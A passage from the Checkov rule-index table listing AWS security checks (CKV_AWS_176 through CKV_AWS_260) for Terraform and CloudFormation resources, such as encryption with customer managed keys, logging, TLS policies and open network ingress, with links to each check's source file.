[WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | -| 560 | CKV_AWS_176 | resource | aws_waf_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | -| 561 | CKV_AWS_176 | resource | aws_wafregional_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | -| 562 | CKV_AWS_177 | resource | aws_kinesis_video_stream | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py) | -| 563 | CKV_AWS_178 | resource | aws_fsx_ontap_file_system | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py) | -| 564 | CKV_AWS_179 | resource | aws_fsx_windows_file_system | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py) | -| 565 | CKV_AWS_180 | resource | aws_imagebuilder_component | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py) | -| 566 | CKV_AWS_181 | resource | aws_s3_object_copy | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py) | -| 567 | CKV_AWS_182 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py) | -| 568 | CKV_AWS_183 | resource | aws_ebs_snapshot_copy | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py) | -| 569 | CKV_AWS_184 | resource | aws_efs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py) | -| 570 | CKV_AWS_185 | resource | aws_kinesis_stream | Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py) | -| 571 | CKV_AWS_186 | resource | aws_s3_bucket_object | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py) | -| 572 | CKV_AWS_187 | resource | aws_sagemaker_domain | Ensure Sagemaker domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | -| 573 | CKV_AWS_189 | resource | aws_ebs_volume | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py) | -| 574 | CKV_AWS_190 | resource | aws_fsx_lustre_file_system | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK) | Terraform | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py) | -| 575 | CKV_AWS_191 | resource | aws_elasticache_replication_group | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py) | -| 576 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | -| 577 | CKV_AWS_192 | resource | aws_wafv2_web_acl | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py) | -| 578 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | -| 579 | CKV_AWS_193 | resource | aws_appsync_graphql_api | Ensure AppSync has Logging enabled | Terraform | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py) | -| 580 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | -| 581 | CKV_AWS_194 | resource | aws_appsync_graphql_api | Ensure AppSync has Field-Level logs enabled | Terraform | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py) | -| 582 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 583 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 584 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 585 | CKV_AWS_195 | resource | aws_glue_crawler | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 586 | CKV_AWS_195 | resource | aws_glue_dev_endpoint | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 587 | CKV_AWS_195 | resource | aws_glue_job | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 588 | CKV_AWS_196 | resource | aws_elasticache_security_group | Ensure no aws_elasticache_security_group resources exist | Terraform | [ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py) | -| 589 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | -| 590 | CKV_AWS_197 | resource | aws_mq_broker | Ensure MQ Broker Audit logging is enabled | Terraform | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py) | -| 591 | CKV_AWS_198 | resource | aws_db_security_group | Ensure no aws_db_security_group resources exist | Terraform | [RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py) | -| 592 | CKV_AWS_199 | resource | aws_imagebuilder_distribution_configuration | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK) | Terraform | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py) | -| 593 | CKV_AWS_200 | resource | aws_imagebuilder_image_recipe | Ensure that Image Recipe EBS Disk are encrypted with CMK | Terraform | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py) | -| 594 | CKV_AWS_201 | resource | aws_memorydb_cluster | Ensure MemoryDB is encrypted at rest using KMS CMKs | Terraform | [MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py) | -| 595 | CKV_AWS_202 | resource | aws_memorydb_cluster | Ensure MemoryDB data is encrypted in transit | Terraform | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py) | -| 596 | CKV_AWS_203 | resource | aws_fsx_openzfs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py) | -| 597 | CKV_AWS_204 | resource | aws_ami | Ensure AMIs are encrypted using KMS CMKs | Terraform | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py) | -| 598 | CKV_AWS_205 | resource | aws_ami_launch_permission | Ensure to Limit AMI launch Permissions | Terraform | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py) | -| 599 | CKV_AWS_206 | resource | aws_api_gateway_domain_name | Ensure API Gateway Domain uses a modern security Policy | Terraform | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py) | -| 600 | CKV_AWS_207 | resource | aws_mq_broker | Ensure MQ Broker minor version updates are enabled | Terraform | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py) | -| 601 | CKV_AWS_208 | resource | aws_mq_broker | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | -| 602 | CKV_AWS_208 | resource | aws_mq_configuration | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | -| 603 | CKV_AWS_209 | resource | aws_mq_broker | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK) | Terraform | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py) | -| 604 | CKV_AWS_210 | resource | aws_batch_job_definition | Batch job does not define a privileged container | Terraform | [BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py) | -| 605 | CKV_AWS_211 | resource | aws_db_instance | Ensure RDS uses a modern CaCert | Terraform | [RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py) | -| 606 | CKV_AWS_212 | resource | aws_dms_replication_instance | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py) | -| 607 | CKV_AWS_213 | resource | aws_load_balancer_policy | Ensure ELB Policy uses only secure protocols | Terraform | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py) | -| 608 | CKV_AWS_214 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted at rest | Terraform | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py) | -| 609 | CKV_AWS_215 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted in transit | Terraform | [AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py) | -| 610 | CKV_AWS_216 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution is enabled | Terraform | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py) | -| 611 | CKV_AWS_217 | resource | aws_api_gateway_deployment | Ensure Create before destroy for API deployments | Terraform | [APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py) | -| 612 | CKV_AWS_218 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using latest TLS | Terraform | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py) | -| 613 | CKV_AWS_219 | resource | aws_codepipeline | Ensure CodePipeline Artifact store is using a KMS CMK | Terraform | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py) | -| 614 | CKV_AWS_220 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using https | Terraform | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py) | -| 615 | CKV_AWS_221 | resource | aws_codeartifact_domain | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py) | -| 616 | CKV_AWS_222 | resource | aws_dms_replication_instance | Ensure DMS replication instance gets all minor upgrade automatically | Terraform | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py) | -| 617 | CKV_AWS_223 | resource | aws_ecs_cluster | Ensure ECS Cluster enables logging of ECS Exec | Terraform | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py) | -| 618 | CKV_AWS_224 | resource | aws_ecs_cluster | Ensure ECS Cluster logging uses CMK | Terraform | [ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py) | -| 619 | CKV_AWS_225 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is enabled | Terraform | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py) | -| 620 | CKV_AWS_226 | resource | aws_db_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | -| 621 | CKV_AWS_226 | resource | aws_rds_cluster_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | -| 622 | CKV_AWS_227 | resource | aws_kms_key | Ensure KMS key is enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py) | -| 623 | CKV_AWS_228 | resource | aws_elasticsearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | -| 624 | CKV_AWS_228 | resource | aws_opensearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | -| 625 | CKV_AWS_229 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | -| 626 | CKV_AWS_229 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | -| 627 | CKV_AWS_230 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | -| 628 | CKV_AWS_230 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | -| 629 | CKV_AWS_231 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | -| 630 | CKV_AWS_231 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | -| 631 | CKV_AWS_232 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | -| 632 | CKV_AWS_232 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | -| 633 | CKV_AWS_233 | resource | aws_acm_certificate | Ensure Create before destroy for ACM certificates | Terraform | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py) | -| 634 | CKV_AWS_234 | resource | aws_acm_certificate | Verify logging preference for ACM certificates | Terraform | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py) | -| 635 | CKV_AWS_235 | resource | aws_ami_copy | Ensure that copied AMIs are encrypted | Terraform | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py) | -| 636 | CKV_AWS_236 | resource | aws_ami_copy | Ensure AMI copying uses a CMK | Terraform | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py) | -| 637 | CKV_AWS_237 | resource | aws_api_gateway_rest_api | Ensure Create before destroy for API Gateway | Terraform | [APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py) | -| 638 | CKV_AWS_238 | resource | aws_guardduty_detector | Ensure that GuardDuty detector is enabled | Terraform | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py) | -| 639 | CKV_AWS_239 | resource | aws_dax_cluster | Ensure DAX cluster endpoint is using TLS | Terraform | [DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py) | -| 640 | CKV_AWS_240 | resource | aws_kinesis_firehose_delivery_stream | Ensure Kinesis Firehose delivery stream is encrypted | Terraform | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py) | -| 641 | CKV_AWS_241 | resource | aws_kinesis_firehose_delivery_stream | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK | Terraform | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py) | -| 642 | CKV_AWS_242 | resource | aws_mwaa_environment | Ensure MWAA environment has scheduler logs enabled | Terraform | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py) | -| 643 | CKV_AWS_243 | resource | aws_mwaa_environment | Ensure MWAA environment has worker logs enabled | Terraform | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py) | -| 644 | CKV_AWS_244 | resource | aws_mwaa_environment | Ensure MWAA environment has webserver logs enabled | Terraform | [MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py) | -| 645 | CKV_AWS_245 | resource | aws_db_instance_automated_backups_replication | Ensure replicated backups are encrypted at rest using KMS CMKs | Terraform | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py) | -| 646 | CKV_AWS_246 | resource | aws_rds_cluster_activity_stream | Ensure RDS Cluster activity streams are encrypted using KMS CMKs | Terraform | [RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py) | -| 647 | CKV_AWS_247 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | -| 648 | CKV_AWS_247 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | -| 649 | CKV_AWS_248 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | -| 650 | CKV_AWS_248 | resource | aws_opensearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | -| 651 | CKV_AWS_249 | resource | aws_ecs_task_definition | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions | Terraform | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py) | -| 652 | CKV_AWS_250 | resource | aws_db_instance | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | -| 653 | CKV_AWS_250 | resource | aws_rds_cluster | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | -| 654 | CKV_AWS_251 | resource | aws_cloudtrail | Ensure CloudTrail logging is enabled | Terraform | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py) | -| 655 | CKV_AWS_252 | resource | aws_cloudtrail | Ensure CloudTrail defines an SNS Topic | Terraform | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py) | -| 656 | CKV_AWS_253 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted | Terraform | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py) | -| 657 | CKV_AWS_254 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted with Customer Managed Key | Terraform | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py) | -| 658 | CKV_AWS_255 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted | Terraform | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py) | -| 659 | CKV_AWS_256 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted using a Customer Managed Key | Terraform | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py) | -| 660 | CKV_AWS_257 | resource | aws_codecommit_approval_rule_template | Ensure CodeCommit branch changes have at least 2 approvals | Terraform | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py) | -| 661 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | -| 662 | CKV_AWS_258 | resource | aws_lambda_function_url | Ensure that Lambda function URLs AuthType is not None | Terraform | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py) | -| 663 | CKV_AWS_259 | resource | aws_cloudfront_response_headers_policy | Ensure CloudFront response header policy enforces Strict Transport Security | Terraform | [CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py) | -| 664 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | 